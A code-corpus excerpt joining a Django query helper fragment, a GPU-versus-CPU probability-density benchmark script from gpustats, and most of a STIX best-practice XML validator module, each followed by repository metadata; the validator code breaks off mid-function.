queryset=_LiveClass.objects.order_by('start'),
to_attr='classes'
)
).prefetch_related(
_Prefetch(
'webinar_set',
queryset=_Webinar.objects.order_by('start'),
to_attr='webinars'
)
).get()
def find_most_recent_cohort():
return _Cohort.objects.order_by('-start').first()
def calculate_most_recent_cohort_path() -> str:
slug_dct = _Cohort.objects.order_by('-start').values('slug').first()
return reverse('modules:detail', kwargs=slug_dct)
def find_webinars():
"""
Retrieve Webinars from database ordered by date desc
:return: Tuple of webinars
"""
return tuple(_Webinar.objects.order_by('-start'))
def find_recorded_webinars():
"""
Retrieve recorded Webinars from database ordered by date desc.
A recorded Webinar has vimeo_id not empty
:return: Tuple of webinars
"""
return tuple(_Webinar.objects.order_by('-start').exclude(vimeo_id__exact=''))
def find_webinar(slug):
"""
Retrieve Webinar by its slug
:return: Webinar
"""
return _Webinar.objects.filter(slug=slug).get()
def find_live_class(pk):
"""
Find Live Class by its PK, selecting related cohort
:param pk:
:return:
"""
return _LiveClass.objects.select_related('cohort').get(pk=pk)
def subscribe_to_last_cohort(user):
ch = CohortStudent(user=user, cohort=find_most_recent_cohort())
ch.save()
return ch
|
agpl-3.0
| -2,346,784,259,353,792,500
| 25.045455
| 115
| 0.65445
| false
| 3.385524
| false
| false
| false
|
dukestats/gpustats
|
scripts/bench.py
|
1
|
6208
|
from pandas import *
import numpy as np
from pycuda.gpuarray import to_gpu
import gpustats
import gpustats.util as util
from scipy.stats import norm
import timeit
data = np.random.randn(1000000)
mean = 20
std = 5
univ_setup = """
import numpy as np
from pycuda.gpuarray import to_gpu
k = 8
means = np.random.randn(k)
stds = np.abs(np.random.randn(k))
mean = 20
std = 5
import gpustats
from scipy.stats import norm
cpu_data = np.random.randn(%d)
gpu_data = cpu_data
"""
univ_setup_gpuarray = univ_setup + """
gpu_data = to_gpu(cpu_data)
"""
multivar_setup = """
# from __main__ import data, mean, std
import gpustats
import gpustats.util as util
import numpy as np
import testmod
from pycuda.gpuarray import to_gpu
import testmod
from numpy.linalg import cholesky as chol
import numpy.linalg as L
def next_multiple(k, p):
if k.__mod__(p):
return k + (p - k.__mod__(p))
return k
PAD_MULTIPLE = 16
HALF_WARP = 16
def pad_data(data):
n, k = data.shape
if not k.__mod__(HALF_WARP):
pad_dim = k + 1
else:
pad_dim = k
if k != pad_dim:
padded_data = np.empty((n, pad_dim), dtype=np.float32)
padded_data[:, :k] = data
return padded_data
else:
return prep_ndarray(data)
def prep_ndarray(arr):
# is float32 and contiguous?
if not arr.dtype == np.float32 or not arr.flags.contiguous:
arr = np.array(arr, dtype=np.float32)
return arr
def pack_params(means, chol_sigmas, logdets):
to_pack = []
for m, ch, ld in zip(means, chol_sigmas, logdets):
to_pack.append(pack_pdf_params(m, ch, ld))
return np.vstack(to_pack)
def pack_pdf_params(mean, chol_sigma, logdet):
k = len(mean)
mean_len = k
chol_len = k * (k + 1) / 2
mch_len = mean_len + chol_len
packed_dim = next_multiple(mch_len + 2, PAD_MULTIPLE)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = chol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = 1, logdet
return packed_params
k = %d
dim = 15
means = np.random.randn(k, dim)
covs = [util.random_cov(dim) for _ in xrange(k)]
cpu_data = np.random.randn(%d, dim)
gpu_data = cpu_data
"""
multivar_setup_gpuarray = multivar_setup + """
gpu_data = to_gpu(cpu_data)
"""
LOG_2_PI = np.log(2 * np.pi)
# def mvnpdf(data, mean, cov):
# ichol_sigma = np.asarray(np.linalg.inv(np.linalg.cholesky(cov)))
# # ichol_sigma = np.tril(ichol_sigma)
# logdet = np.log(np.linalg.det(cov))
# return [_mvnpdf(x, mean, ichol_sigma, logdet)
# for x in data]
# def _mvnpdf(x, mean, ichol_sigma, logdet):
# demeaned = x - mean
# discrim = ((ichol_sigma * demeaned) ** 2).sum()
# # discrim = np.dot(demeaned, np.dot(ichol_sigma, demeaned))
# return - 0.5 * (discrim + logdet + LOG_2_PI * dim)
def get_timeit(stmt, setup, iter=10):
return timeit.Timer(stmt, setup).timeit(number=iter) / iter
def compare_timings_single(n, setup=univ_setup):
gpu = "gpustats.normpdf(gpu_data, mean, std, logged=False)"
cpu = "norm.pdf(cpu_data, loc=mean, scale=std)"
setup = setup % n
return {'GPU' : get_timeit(gpu, setup, iter=1000),
'CPU' : get_timeit(cpu, setup)}
def compare_timings_multi(n, setup=univ_setup):
gpu = "gpustats.normpdf_multi(gpu_data, means, stds, logged=False)"
cpu = """
for m, s in zip(means, stds):
norm.pdf(cpu_data, loc=m, scale=s)
"""
setup = setup % n
return {'GPU' : get_timeit(gpu, setup, iter=100),
'CPU' : get_timeit(cpu, setup)}
def mvcompare_timings(n, k=1, setup=multivar_setup):
gpu = "gpustats.mvnpdf_multi(gpu_data, means, covs, logged=False)"
cpu = """
ichol_sigmas = [L.inv(chol(sig)) for sig in covs]
logdets = [np.log(np.linalg.det(sig)) for sig in covs]
params = pack_params(means, covs, logdets)
testmod.cpu_mvnpdf(cpu_data, params, dim)
"""
setup = setup % (k, n)
return {'GPU' : get_timeit(gpu, setup, iter=100),
'CPU' : get_timeit(cpu, setup)}
def get_timing_results(timing_f):
lengths = [100, 1000, 10000, 100000, 1000000]
result = {}
for n in lengths:
print n
result[n] = timing_f(n)
result = DataFrame(result).T
result['Speedup'] = result['CPU'] / result['GPU']
return result
# mvsingle = get_timing_results(mvcompare_timings)
# comp_gpu = lambda n: mvcompare_timings(n, setup=multivar_setup_gpuarray)
# mvsingle_gpu = get_timing_results(comp_gpu)
# multi_comp = lambda n: mvcompare_timings(n, k=16)
# mvmulti = get_timing_results(multi_comp)
# multi_comp_gpu = lambda n: mvcompare_timings(n, k=16,
# setup=multivar_setup_gpuarray)
# mvmulti_gpu = get_timing_results(multi_comp_gpu)
single = get_timing_results(compare_timings_single)
comp_gpu = lambda n: compare_timings_single(n, setup=univ_setup_gpuarray)
single_gpu = get_timing_results(comp_gpu)
multi = get_timing_results(compare_timings_multi)
comp_gpu = lambda n: compare_timings_multi(n, setup=univ_setup_gpuarray)
multi_gpu = get_timing_results(comp_gpu)
data = DataFrame({
'Single' : single['Speedup'],
'Single (GPUArray)' : single_gpu['Speedup'],
'Multi' : multi['Speedup'],
'Multi (GPUArray)' : multi_gpu['Speedup'],
})
mvdata = DataFrame({
'Single' : mvsingle['Speedup'],
'Single (GPUArray)' : mvsingle_gpu['Speedup'],
'Multi' : mvmulti['Speedup'],
'Multi (GPUArray)' : mvmulti_gpu['Speedup'],
})
if __name__ == '__main__':
import gpustats
import numpy as np
from scipy.stats import norm
import testmod
from numpy.linalg import cholesky as chol
import numpy.linalg as L
# dim = 15
# k = 8
# means = np.random.randn(k, dim)
# covs = [np.asarray(util.random_cov(dim)) for _ in xrange(k)]
# cpu_data = np.random.randn(100000, dim)
# gpu_data = to_gpu(cpu_data)
# ichol_sigmas = [L.inv(chol(sig)) for sig in covs]
# logdets = [np.log(np.linalg.det(sig)) for sig in covs]
# packed_params = pack_params(means, covs, logdets)
# pdfs = gpustats.mvnpdf(cpu_data, means[0], covs[0])
# pdfs = testmod.cpu_mvnpdf(cpu_data, packed_params, 15)
|
bsd-3-clause
| 1,382,903,943,584,763,100
| 26.22807
| 74
| 0.637081
| false
| 2.828246
| false
| false
| false
|
STIXProject/stix-validator
|
sdv/validators/stix/best_practice.py
|
1
|
42947
|
# Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
# builtin
import re
import itertools
import collections
import distutils.version
# external
from lxml import etree
from mixbox.vendor.six import iteritems, itervalues, with_metaclass
from mixbox import compat
# internal
from sdv import utils, xmlconst
# relative
from . import common
from .. import base
from ...utils import remove_version_prefix
# Python 2.6 doesn't have collections.OrderedDict :(
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
# STIX ID Format: [ns prefix]:[construct type]-[GUID]
# Note: This will validate invalid QNames, so this should be used with a
# QName format check.
ID_PATTERN = re.compile(r"[\w\-]+:\w+-.+", re.UNICODE)
def rule(minver, maxver=None):
"""Decorator that identifies methods as being a STIX best practice checking
rule.
Args:
version: Identifies the minimum version of STIX for which the decorated
method applies.
"""
def decorator(func):
func.is_rule = True
func.min_version = minver
func.max_version = maxver
return func
return decorator
class BestPracticeMeta(type):
"""Metaclass that collects all :meth:`rule` decorated methods and
builds an internal mapping of STIX version numbers to rules.
"""
def __new__(metacls, name, bases, dict_):
obj = type.__new__(metacls, name, bases, dict_)
# Initialize a mapping of STIX versions to applicable rule funcs.
ruledict = collections.defaultdict(list)
# Find all @rule marked functions in the class dict_
rulefuncs = (x for x in itervalues(dict_) if hasattr(x, 'is_rule'))
# Build the rule function dict.
for rule in rulefuncs:
ruledict[(rule.min_version, rule.max_version)].append(rule) # noqa
# Attach the rule dictionary to the object instance.
obj._rules = ruledict # noqa
return obj
class BestPracticeWarning(compat.MutableMapping, base.ValidationError):
"""Represents a best practice warning. These are built within best
practice rule checking methods and attached to
:class:`BestPracticeWarningCollection` instances.
Note:
This class acts like a dictionary and contains the following keys
at a minimum:
* ``'id'``: The id of a node associated with the warning.
* ``'idref'``: The idref of a node associated with the warning.
* ``'line'``: The line number of the offending node.
* ``'message'``: A message associated with the warning.
* ``'tag'``: The lxml tag for the offending node.
These keys can be retrieved via the :attr:`core_keys` property.
Instances of this class may attach additional keys. These `other keys`
can be obtained via the :attr:`other_keys` property.
Args:
node: The ``lxml._Element`` node associated with this warning.
message: A message for this warning.
"""
def __init__(self, node, message=None):
base.ValidationError.__init__(self)
self._inner = OrderedDict()
self._node = node
self['line'] = node.sourceline
self['message'] = message
self['id'] = node.attrib.get('id')
self['idref'] = node.attrib.get('idref')
self['tag'] = node.tag
def __unicode__(self):
return unicode(self.message)
def __str__(self):
return unicode(self).encode("utf-8")
def __getitem__(self, key):
return self._inner.__getitem__(key)
def __delitem__(self, key):
self._inner.__delitem__(key)
def __setitem__(self, key, value):
self._inner.__setitem__(key, value)
def __len__(self):
return self._inner.__len__()
def __iter__(self):
return self._inner.__iter__()
@property
def line(self):
"""Returns the line number of the warning node in the input document.
"""
return self['line']
@property
def message(self):
"""Returns a message associated with the warning. This may return
``None`` if there is no warning message.
"""
return self['message']
@property
def core_keys(self):
"""Returns a ``tuple`` of the keys that can always be found on
instance of this class.
Returns:
A tuple including the following keys.
* ``'id'``: The id of the warning node. The associated value
may be ``None``.
* ``'idref'``: The idref of the warning node. The associated value
may be ``None``.
* ``'line'``: The line number of the warning node in the input
document. The associated value may be ``None``.
* ``'tag'``: The ``{namespace}localname`` value of the warning
node.
* ``'message'``: An optional message that can be attached to the
warning. The associated value may be ``None``.
"""
return ('id', 'idref', 'line', 'tag', 'message')
@property
def other_keys(self):
"""Returns a ``tuple`` of keys attached to instances of this class that
are not found in the :attr:`core_keys`.
"""
return tuple(x for x in self if x not in self.core_keys)
def as_dict(self):
"""Returns a dictionary representation of this class instance. This
is implemented for consistency across other validation error types.
The :class:`.BestPracticeWarning` class extends
:class:`collections.MutableMapping`, so this method isn't really
necessary.
"""
return dict(iteritems(self))
class BestPracticeWarningCollection(compat.MutableSequence):
"""A collection of :class:`BestPracticeWarning` instances for a given
type of STIX Best Practice.
For example, all warnings about STIX constructs missing titles would
go within an instance of this class.
Note:
This class behaves like a mutable sequence, such as a ``list``.
Args:
name: The name of the STIX best practice for this collection (e.g.,
'Missing Titles').
Attributes:
name: The name of the STIX best practice for this collection (e.g.,
'Missing Titles').
"""
def __init__(self, name):
super(BestPracticeWarningCollection, self).__init__()
self.name = name
self._warnings = []
def insert(self, idx, value):
"""Inserts `value` at `idx` into this
:class:`BestPracticeWarningCollection` instance.
Note:
Values that evaluate to ``False`` will not be inserted.
"""
if not value:
return
if isinstance(value, etree._Element): # noqa
value = BestPracticeWarning(node=value)
self._warnings.insert(idx, value)
def __getitem__(self, key):
return self._warnings.__getitem__(key)
def __setitem__(self, key, value):
self._warnings.__setitem__(key, value)
def __delitem__(self, key):
self._warnings.__delitem__(key)
def __len__(self):
return len(self._warnings)
def __nonzero__(self):
return bool(self._warnings)
def as_dict(self):
"""Returns a dictionary representation.
The key of the dictionary is the ``name`` of this collection. The
associated value is a ``list`` of :class:`BestPracticeWarning`
dictionaries.
"""
if not self:
return {}
return {self.name: [x.as_dict() for x in self]}
class BestPracticeValidationResults(base.ValidationResults, compat.MutableSequence):
"""Represents STIX best practice validation results. This class behaves
like a ``list`` and accepts instances of
:class:`BestPracticeWarningCollection`.
"""
def __init__(self):
base.ValidationResults.__init__(self, False)
self._warnings = []
@base.ValidationResults.is_valid.getter
def is_valid(self):
"""Returns ``True`` if an instance of this class contains no warning
collections or only contains only warning collections.
"""
return not(any(self))
@property
def errors(self):
"""Returns a ``list`` of :class:`BestPracticeWarningCollection`
instances.
"""
return [x for x in self if x]
def insert(self, idx, value):
"""Inserts an instance of :class:`BestPracticeWarningCollection`.
Note:
If ``bool(value) == False`` then `value` will not be inserted.
Raises:
ValueError: If `value` is not an instance of
:class:`BestPracticeWarningCollection`.
"""
if not value:
return
if not isinstance(value, BestPracticeWarningCollection):
raise ValueError(
"Value must be instance of BestPracticeWarningCollection"
)
self._warnings.insert(idx, value)
def __getitem__(self, key):
return self._warnings.__getitem__(key)
def __setitem__(self, key, value):
self._warnings.__setitem__(key, value)
def __delitem__(self, key):
self._warnings.__delitem__(key)
def __len__(self):
return len(self._warnings)
def __nonzero__(self):
return bool(self._warnings)
def as_dict(self):
"""Returns a dictionary representation.
Keys:
* ``'result'``: The result of the validation. Values can be
``True`` or ``False`` .
* ``'errors'``: A list of :class:`BestPracticeWarningCollection`
dictionaries.
"""
d = base.ValidationResults.as_dict(self)
if any(self):
d['errors'] = [x.as_dict() for x in self if x]
return d
class STIXBestPracticeValidator(with_metaclass(BestPracticeMeta, object)):
"""Performs STIX Best Practice validation."""
@rule('1.0')
def _check_id_presence(self, root, namespaces, version): # noqa
"""Checks that all major STIX/CybOX constructs have id attributes set.
Constructs with idref attributes set should not have an id attribute
and are thus omitted from the results.
"""
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('Missing IDs')
xpath = " | ".join("//%s" % x for x in to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
if any(x in node.attrib for x in ('id', 'idref')):
continue
warning = BestPracticeWarning(node=node)
results.append(warning)
return results
@rule('1.0')
def _check_id_format(self, root, namespaces, version): # noqa
"""Checks that the core STIX/CybOX constructs in the STIX instance
document have ids and that each id is a valid QName, formatted as
follows:
``[ns_prefix]:[object-type]-[GUID].``
Note:
This only checks for STIX ID best practices and does not verify
that the ID is a valid QName. QName conformance verification is
done during XML Schema validation.
"""
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('ID Format')
msg = "ID should be formatted as [ns prefix]:[construct type]-[GUID]"
xpath = " | ".join("//%s[@id]" % x for x in to_check)
for node in root.xpath(xpath, namespaces=namespaces):
id_ = node.attrib['id']
if ID_PATTERN.match(id_):
continue
result = BestPracticeWarning(node=node, message=msg)
results.append(result)
return results
def _get_id_timestamp_conflicts(self, nodes):
"""Returns a list of BestPracticeWarnings for all nodes in `nodes`
that have duplicate (id, timestamp) pairs.
"""
warns = []
def _equal_timestamps(nodeset):
return [x for x in nodeset if utils.is_equal_timestamp(node, x)]
while len(nodes) > 1:
node = nodes.pop()
ts_equal = _equal_timestamps(nodes)
if not ts_equal:
continue
conflicts = itertools.chain(ts_equal, (node,))
for c in conflicts:
warning = BestPracticeWarning(node=c)
warning['timestamp'] = c.attrib.get('timestamp')
warns.append(warning)
utils.remove_all(nodes, ts_equal)
return warns
@rule('1.2')
def _check_1_2_duplicate_ids(self, root, namespaces, version): # noqa
"""STIX 1.2 dropped the schematic enforcement of id uniqueness to
support versioning of components.
This checks for duplicate (id, timestamp) pairs.
"""
results = BestPracticeWarningCollection('Duplicate IDs')
nlist = namespaces.values()
# Find all nodes with IDs in the STIX/CybOX namespace
nodes = root.xpath("//*[@id]")
filtered = [x for x in nodes if utils.namespace(x) in nlist]
# Build a mapping of IDs to nodes
idnodes = collections.defaultdict(list)
for node in filtered:
idnodes[node.attrib.get('id')].append(node)
# Find all nodes that have duplicate IDs
dups = [x for x in itervalues(idnodes) if len(x) > 1]
# Build warnings for all nodes that have conflicting id/timestamp pairs.
for nodeset in dups:
warns = self._get_id_timestamp_conflicts(nodeset)
results.extend(warns)
return results
@rule(minver='1.0', maxver='1.1.1')
def _check_1_0_duplicate_ids(self, root, namespaces, version): # noqa
"""Checks for duplicate ids in the document.
"""
id_nodes = collections.defaultdict(list)
for node in root.xpath("//*[@id]"):
id_nodes[node.attrib['id']].append(node)
results = BestPracticeWarningCollection('Duplicate IDs')
for nodes in itervalues(id_nodes):
if len(nodes) > 1:
results.extend(BestPracticeWarning(node=x) for x in nodes)
return results
@rule('1.0')
def _check_idref_resolution(self, root, namespaces, version): # noqa
"""Checks that all idrefs resolve to a construct in the document.
"""
idrefs = root.xpath("//*[@idref]")
ids = root.xpath("//@id")
def idref(x):
return x.attrib['idref']
results = BestPracticeWarningCollection("Unresolved IDREFs")
warns = (BestPracticeWarning(x) for x in idrefs if idref(x) not in ids)
results.extend(warns)
return results
@rule('1.0')
def _check_idref_with_content(self, root, namespaces, version): # noqa
"""Checks that constructs with idref set do not contain content.
Note:
Some STIX/CybOX constructs (e.g., ``Related_Object`` instances) are
exceptions to this rule.
"""
def is_invalid(node):
if common.is_idref_content_exception(node):
return False
return utils.has_content(node)
nodes = root.xpath("//*[@idref]")
warnings = (BestPracticeWarning(x) for x in nodes if is_invalid(x))
results = BestPracticeWarningCollection("IDREF with Content")
results.extend(warnings)
return results
@rule('1.0')
def _check_indicator_practices(self, root, namespaces, version): # noqa
"""Looks for STIX Indicators that are missing a Description, Type,
Valid_Time_Position, Indicated_TTP, and/or Confidence.
"""
to_check = (
"{0}:Indicator".format(common.PREFIX_STIX_CORE),
"{0}:Indicator".format(common.PREFIX_STIX_COMMON),
"{0}:Indicator".format(common.PREFIX_STIX_REPORT),
)
results = BestPracticeWarningCollection("Indicator Suggestions")
xpath = " | ".join("//%s" % x for x in to_check)
ns = namespaces[common.PREFIX_STIX_INDICATOR]
for indicator in root.xpath(xpath, namespaces=namespaces):
missing = []
if 'idref' not in indicator.attrib:
if indicator.find('{%s}Description' % ns) is None:
missing.append("Description")
if indicator.find('{%s}Type' % ns) is None:
missing.append("Type")
if indicator.find('{%s}Valid_Time_Position' % ns) is None:
missing.append('Valid_Time_Position')
if indicator.find('{%s}Indicated_TTP' % ns) is None:
missing.append('Indicated_TTP')
if indicator.find('{%s}Confidence' % ns) is None:
missing.append('Confidence')
if missing:
warning = BestPracticeWarning(node=indicator)
warning['missing'] = missing
results.append(warning)
return results
@rule('1.0')
def _check_root_element(self, root, namespaces, version): # noqa
"""Checks that the root element is a STIX_Package.
"""
ns = namespaces[common.PREFIX_STIX_CORE]
results = BestPracticeWarningCollection("Root Element")
if root.tag != "{%s}STIX_Package" % (ns):
warning = BestPracticeWarning(node=root)
results.append(warning)
return results
@rule('1.0')
def _check_latest_vocabs(self, root, namespaces, version): # noqa
"""Checks that all STIX vocabs are using latest published versions.
Triggers a warning if an out of date vocabulary is used.
Note:
The xpath used to discover instances of controlled vocabularies
assumes that the type name ends with 'Vocab-'. An example
instance would be 'IndicatorTypeVocab-1.0'.
"""
results = BestPracticeWarningCollection("Vocab Suggestions")
xpath = "//*[contains(@xsi:type, 'Vocab-')]"
for vocab in root.xpath(xpath, namespaces=namespaces):
xsi_type = vocab.attrib[xmlconst.TAG_XSI_TYPE]
name = common.parse_vocab_name(xsi_type)
found = common.parse_vocab_version(xsi_type)
expected = common.get_vocab_version(root, version, xsi_type)
if found == expected:
continue
warning = BestPracticeWarning(node=vocab)
warning['vocab name'] = name
warning['version found'] = found
warning['version expected'] = expected
results.append(warning)
return results
@rule('1.0')
def _check_latest_versions(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs versions are equal to
the latest version.
"""
to_check = common.STIX_COMPONENT_VERSIONS[version]
results = BestPracticeWarningCollection('Latest Component Versions')
def _is_expected(node, expected):
if 'version' not in node.attrib:
return True
return node.attrib['version'] == expected
for selector, expected in iteritems(to_check):
xpath = "//%s" % selector
for node in root.xpath(xpath, namespaces=namespaces):
if _is_expected(node, expected):
continue
warning = BestPracticeWarning(node)
warning['version found'] = node.attrib['version']
warning['version expected'] = expected
results.append(warning)
return results
def _check_timestamp_usage(self, root, namespaces, selectors):
"""Inspects each node in `nodes` for correct timestamp use.
"""
results = BestPracticeWarningCollection("Timestamp Use")
xpath = " | ".join("//%s" % x for x in selectors)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
attrib = node.attrib.get
id_ = attrib('id')
idref = attrib('idref')
timestamp = attrib('timestamp')
if timestamp:
tz_set = utils.has_tzinfo(timestamp)
if not tz_set:
warning = BestPracticeWarning(
node = node,
message="Timestamp without timezone information."
)
warning['timestamp'] = timestamp
results.append(warning)
if id_ and not timestamp:
warning = BestPracticeWarning(
node=node,
message="ID present but missing timestamp"
)
elif idref and not timestamp:
warning = BestPracticeWarning(
node=node,
message="IDREF present but missing timestamp"
)
elif idref and timestamp:
resolves = common.idref_timestamp_resolves(
root=root,
idref=idref,
timestamp=timestamp,
namespaces=namespaces
)
if resolves:
continue
warning = BestPracticeWarning(
node=node,
message="IDREF and timestamp combination do not resolve "
"to a node in the input document."
)
warning['timestamp'] = timestamp
else:
continue
results.append(warning)
return results
@rule(minver='1.1', maxver='1.1.1')
def _check_1_1_timestamp_usage(self, root, namespaces, **kwargs): # noqa
"""Checks that all major STIX constructs have appropriate
timestamp usage.
Note:
This does not check core CybOX constructs because they lack
timestamp attributes.
"""
to_check = common.STIX_CORE_COMPONENTS
results = self._check_timestamp_usage(root, namespaces, to_check)
return results
@rule('1.2')
def _check_1_2_timestamp_usage(self, root, namespaces, **kwargs): # noqa
"""Checks that all major STIX constructs have appropriate
timestamp usage.
Note:
This does not check core CybOX constructs because they lack
timestamp attributes.
"""
to_check = common.STIX_CORE_COMPONENTS[2:] # skip STIX Packages
results = self._check_timestamp_usage(root, namespaces, to_check)
return results
def _check_titles(self, root, namespaces, selectors):
"""Checks that each node in `nodes` has a ``Title`` element unless
there is an ``@idref`` attribute set.
"""
results = BestPracticeWarningCollection("Missing Titles")
xpath = " | ".join("//%s" % x for x in selectors)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
if 'idref' in node.attrib:
continue
if not any(utils.localname(x) == 'Title' for x in utils.iterchildren(node)):
warning = BestPracticeWarning(node=node)
results.append(warning)
return results
@rule(minver='1.0', maxver='1.1.1')
def _check_1_0_titles(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs have a Title element.
"""
to_check = (
'{0}:STIX_Package/{0}:STIX_Header'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_COMMON),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_CORE),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_COMMON),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_CORE),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_COMMON),
'{0}:Incident'.format(common.PREFIX_STIX_CORE),
'{0}:Incident'.format(common.PREFIX_STIX_COMMON),
'{0}:Indicator'.format(common.PREFIX_STIX_CORE),
'{0}:Indicator'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_COMMON)
)
results = self._check_titles(root, namespaces, to_check)
return results
@rule('1.2')
def _check_1_2_titles(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs have a Title element.
"""
to_check = (
'{0}:Campaign'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_COMMON),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_CORE),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_COMMON),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_CORE),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_COMMON),
'{0}:Incident'.format(common.PREFIX_STIX_CORE),
'{0}:Incident'.format(common.PREFIX_STIX_COMMON),
'{0}:Indicator'.format(common.PREFIX_STIX_CORE),
'{0}:Indicator'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_COMMON),
'{0}:Report/{1}:Header'.format(common.PREFIX_STIX_CORE, common.PREFIX_STIX_REPORT),
'{0}:Report/{1}:Header'.format(common.PREFIX_STIX_COMMON, common.PREFIX_STIX_REPORT)
)
results = self._check_titles(root, namespaces, to_check)
return results
@rule('1.0')
def _check_marking_control_xpath(self, root, namespaces, version): # noqa
"""Checks that data marking controlled structure XPaths are valid
and resolve to nodes in the `root` document.
"""
results = BestPracticeWarningCollection("Data Marking Control XPath")
xpath = "//%s:Controlled_Structure" % common.PREFIX_DATA_MARKING
for elem in root.xpath(xpath, namespaces=namespaces):
if not elem.text:
message = "Empty Control XPath"
else:
message = common.test_xpath(elem)
if message:
result = BestPracticeWarning(node=elem, message=message)
results.append(result)
return results
@rule('1.0')
def _check_condition_attribute(self, root, namespaces, version): # noqa
"""Checks that Observable properties contain a ``@condition``
attribute.
This will also attempt to resolve Observables which are referenced
(not embedded) within Indicators.
Note:
This could produce inaccurate results if a CybOX ObjectProperties
instance contains fields that do not contain a ``condition``
attribute (e.g., a field that is not patternable).
"""
results = BestPracticeWarningCollection(
"Indicator Pattern Properties Missing Condition Attributes"
)
selectors = (
"//{0}:Indicator".format(common.PREFIX_STIX_CORE),
"//{0}:Indicator".format(common.PREFIX_STIX_COMMON),
"//{0}:Indicator".format(common.PREFIX_STIX_REPORT)
)
xpath = " | ".join(selectors)
indicators = root.xpath(xpath, namespaces=namespaces)
if len(indicators) == 0:
return results
def _get_leaves(nodes):
"""Finds and returns all leaf nodes contained within `nodes`."""
leaves = []
for n in nodes:
leaves.extend(x for x in utils.leaves(n) if utils.has_content(x))
return leaves
def _get_observables(indicators):
"""Iterates over `indicators` and yields an (indicator instance,
observable list) tuple with each pass.
The observable list contains all observable instances embedded or
referenced within the Indicator.
"""
for indicator in indicators:
observables = common.get_indicator_observables(
root=root,
indicator=indicator,
namespaces=namespaces
)
yield (indicator, observables)
xpath = ".//{0}:Properties".format(common.PREFIX_CYBOX_CORE)
for indicator, observables in _get_observables(indicators):
id_ = indicator.attrib.get('id', 'No ID Found')
for obs in observables:
props = obs.xpath(xpath, namespaces=namespaces)
for leaf in _get_leaves(props):
if leaf.attrib.get('condition'):
continue
result = BestPracticeWarning(leaf)
result['parent indicator id'] = id_
result['parent indicator line'] = indicator.sourceline
results.append(result)
return results
@rule('1.0')
def _check_example_namespace(self, root, namespaces, version): # noqa
"""Checks for nodes in the input `root` document that contain IDs
which fall under the ``example`` namespace.
"""
ex_namespaces = ('http://example.com', 'http://example.com/')
# Get all the namespaces used in the document
doc_nsmap = utils.get_document_namespaces(root)
# Element tags to check for example ID presence
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('IDs Use Example Namespace')
xpath = " | ".join("//%s" % x for x in to_check)
for node in root.xpath(xpath, namespaces=namespaces):
if 'id' not in node.attrib:
continue
# ID attr found. Break it up into ns prefix and local parts
id_parts = node.attrib['id'].split(":")
if len(id_parts) != 2:
continue
# Try to get the namespace mapped to the ID ns prefix
prefix = id_parts[0]
ns = doc_nsmap.get(prefix)
if ns not in ex_namespaces:
continue
result = BestPracticeWarning(node=node)
results.append(result)
return results
def _get_1_2_tlo_deprecations(self, root, namespaces):
"""Checks for the existence of any idref elements inside the STIX
Package top-level collections.
"""
stix = (
'//{0}:Campaigns/{0}:Campaign',
'//{0}:Courses_Of_Action/{0}:Course_Of_Action',
'//{0}:Exploit_Targets/{0}:Exploit_Target',
'//{0}:Incidents/{0}:Incident',
'//{0}:Indicators/{0}:Indicator',
'//{0}:Threat_Actors/{0}:Threat_Actor',
'//{0}:TTPs/{0}:TTP',
'//{0}:Related_Packages/{0}:Related_Package/{0}:Package',
)
cybox = "//{0}:Observables/{1}:Observable".format(
common.PREFIX_STIX_CORE,
common.PREFIX_CYBOX_CORE
)
# Combine the STIX and CybOX selectors
to_check = [x.format(common.PREFIX_STIX_CORE) for x in stix]
to_check.append(cybox)
xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
# Create result collection
msg = "IDREFs in top-level collections is deprecated."
# Attach warnings to collection
warns = []
for node in nodes:
if 'idref' not in node.attrib:
continue
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
def _get_1_2_related_package_deprecations(self, root, namespaces):
"""Checks for deprecated use of Related_Packages in STIX component
instances.
"""
selector = "//{0}:Related_Packages"
prefixes = (
common.PREFIX_STIX_CAMPAIGN,
common.PREFIX_STIX_COA,
common.PREFIX_STIX_EXPLOIT_TARGET,
common.PREFIX_STIX_INCIDENT,
common.PREFIX_STIX_INDICATOR,
common.PREFIX_STIX_THREAT_ACTOR,
common.PREFIX_STIX_TTP
)
to_check = (selector.format(prefix) for prefix in prefixes)
